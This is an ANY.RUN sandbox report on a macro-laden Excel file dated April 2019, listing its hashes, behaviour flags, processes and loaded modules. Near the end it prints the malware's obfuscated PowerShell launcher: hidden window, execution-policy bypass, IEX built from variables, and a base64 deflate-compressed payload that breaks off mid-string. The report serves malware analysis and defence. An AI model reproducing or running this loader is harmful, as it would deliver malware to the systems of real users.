General Info

File name

Documento_059025_FT_20190415_0005008_.xls

Full analysis
https://app.any.run/tasks/7776f0fc-fe25-4811-86c3-b1a1e8887ba2
Verdict
Malicious activity
Analysis date
4/15/2019, 08:52:59
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: utetnte, Last Saved By: IEUser, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Apr 11 12:50:29 2019, Last Saved Time/Date: Fri Apr 12 09:11:38 2019, Security: 0
MD5

bdca0278481f87df29f57f9a59bee23c

SHA1

64c21e56d8f35b9b0f9f1533f0b8850faf31dd75

SHA256

9dc2a7a5a2f6a93ccedd912ce3a529d7c42155396a5610536ecf107df15ddab1

SSDEEP

1536:mn1DN3aMePUKccCEW8yjJTdrBZq8/Ek3hOdsylKlgryzc4bNhZFGzE+cL2knAxl+:mn1DN3aM+UKccCEW8yjJTdrBZq8/Ek3z

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Executes PowerShell scripts
  • EXCEL.EXE (PID: 2076)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 2076)
Executes PowerShell scripts
  • powershell.exe (PID: 3368)
Creates files in the user directory
  • powershell.exe (PID: 3640)
  • powershell.exe (PID: 3368)
Application launched itself
  • powershell.exe (PID: 3368)
  • rundll32.exe (PID: 2720)
Uses RUNDLL32.EXE to load library
  • rundll32.exe (PID: 2720)
Creates files in the user directory
  • EXCEL.EXE (PID: 2076)
  • EXCEL.EXE (PID: 3564)
  • EXCEL.EXE (PID: 1160)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 2076)
  • EXCEL.EXE (PID: 3564)
  • EXCEL.EXE (PID: 1160)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.xls
|   Microsoft Excel sheet (48%)
.xls
|   Microsoft Excel sheet (alternate) (39.2%)
EXIF
FlashPix
Author:
utetnte
LastModifiedBy:
IEUser
Software:
Microsoft Excel
CreateDate:
2019:04:11 11:50:29
ModifyDate:
2019:04:12 08:11:38
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
Microsoft
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
aprile 2019
HeadingPairs
null
null
CompObjUserTypeLen:
31
CompObjUserType:
Microsoft Excel 2003 Worksheet

Screenshots

Processes

Total processes
44
Monitored processes
9
Malicious processes
1
Suspicious processes
2

Behavior graph

+
start excel.exe no specs excel.exe no specs rundll32.exe no specs rundll32.exe no specs rundll32.exe no specs mctadmin.exe no specs excel.exe no specs powershell.exe no specs powershell.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
1160
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
3564
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
2720
CMD
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl
Path
C:\Windows\System32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\intl.cpl
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\input.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\propsys.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\kbdit.dll

PID
636
CMD
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL input.dll
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\input.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\ime\sptip.dll
c:\program files\windows nt\tabletextservice\tabletextservice.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\kbdit.dll

PID
1136
CMD
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL input.dll
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\input.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\winsta.dll
c:\windows\system32\kbdit.dll

PID
3776
CMD
C:\Windows\system32\mctadmin.exe
Path
C:\Windows\system32\mctadmin.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MCTAdmin
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mctadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2076
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\winmm.dll

PID
3368
CMD
powershell -w 1 -nOPROF -NONinTe -exEcUtI BYPass -C "set-variable -name "LB" -value "I"; set-variable -name "I" -value "E"; set-variable -name "V" -value "X"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString()('('' & ((gv ''''*MDr*'''').naMe[3,11,2]-Join'''''''') (neW-obJECt syStEM.Io.comPREssioN.deFlATEsTrEaM( [IO.MeMorYstrEAm][cONveRt]::frombAsE64STring( ''''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